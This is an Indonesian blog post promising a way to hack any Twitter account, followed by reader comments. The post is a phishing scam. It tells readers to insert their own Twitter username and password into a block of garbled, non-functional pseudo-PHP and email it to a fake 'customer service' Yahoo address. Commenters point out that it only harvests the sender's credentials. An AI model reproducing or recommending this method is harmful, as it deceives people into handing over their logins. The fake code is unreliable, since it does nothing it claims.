Selasa, 05 Juli 2011

Cara Menghack Akun Twitter

Mudah saja, tinggal kirimkan e-mail seperti di bawah ini ke alamat e-mail customer service Twitter, twitter_customers@yahoo.com

twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0];

if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
$salt = "abchefghjkmnpqrstuvwxyz0123456789";
srand((double)microtime()*1000000);
$i = 0;
while ($i <= 7) { $num = decrypt() % 33; $tmp = substr($salt, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } mail($email_address, $subject, $message, "Twitter Password Reset Confirmation } /end$

Yang perlu diperhatikan:
1. PUT_USERNAME_HERE diganti dengan username akun yang ingin dihack.
2. YOUR_USERNAME_HERE diganti dengan username akun Twitter Anda.
3. YOURPASSWORDHERE diganti dengan password akun Twitter Anda yang sesuai dengan username yang Anda masukkan di atas. Hal ini adalah bagian terpenting untuk mengetahui bagaimana hubungan Anda dengan korban dalam jaringan Twitter.

Kirim kode yang sudah diedit di atas ke alamat e-mail twitter_customers@yahoo.com dengan subjek:
$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();

VICTIMUSERNAME diganti dengan username akun Twitter korban.

12 komentar:

  1. ah apaan gue cobain alamatnya diabled!!

    BalasHapus
  2. Jangan diturutin dia cuma nipu, liat kalian disuruh PUT YOUR USERNAME, sama PUT YOUR PASSWORD
    itu berarti dia minta kita ngirimin username twitt kita sama password kita

    BalasHapus
  3. wokkokokoo, bego banget yang mau nurutin cara diatas :P
    mana ada admin twitter pake email dari Yahoo

    BalasHapus
  4. Balasan
    1. betul banget bang idris,postingan ini S*MPAH

      Hapus
  5. dsr tukang kibul
    yang dah ikutni postingan slamat y....
    kmu dah berhasil di hack.

    BalasHapus
  6. twitter_customers@yahoo.com ? "@yahoo.com", apaan nih, biasanya pake domainnya sendiri "@twitter.com", n satu lagi, emangnya Twitter goblok ampe ga tau password gw, trus gw disuruh nulis email berisi password gw gitu???

    BalasHapus
  7. hanya orang bodoh saja yang mau mengikuti cara yang diatas.

    BalasHapus
  8. alamat twitternya alay pake yahoo.com hahahahahahah bukannya biasanya pake twitter.com truss kenapa harus ngisi password?? kenapa hacknya alaay.

    BalasHapus
  9. krennn banget cara di atas.. hahhha :P @yahoo.com ????

    BalasHapus
  10. wkwkwkwkwkwk, masih ada yg buat tutorial kayak gini :p
    mana mungkin server se-gede Twitter pake email service yahoo yang notabene cuma gratisan ? :p wkwkwk

    BalasHapus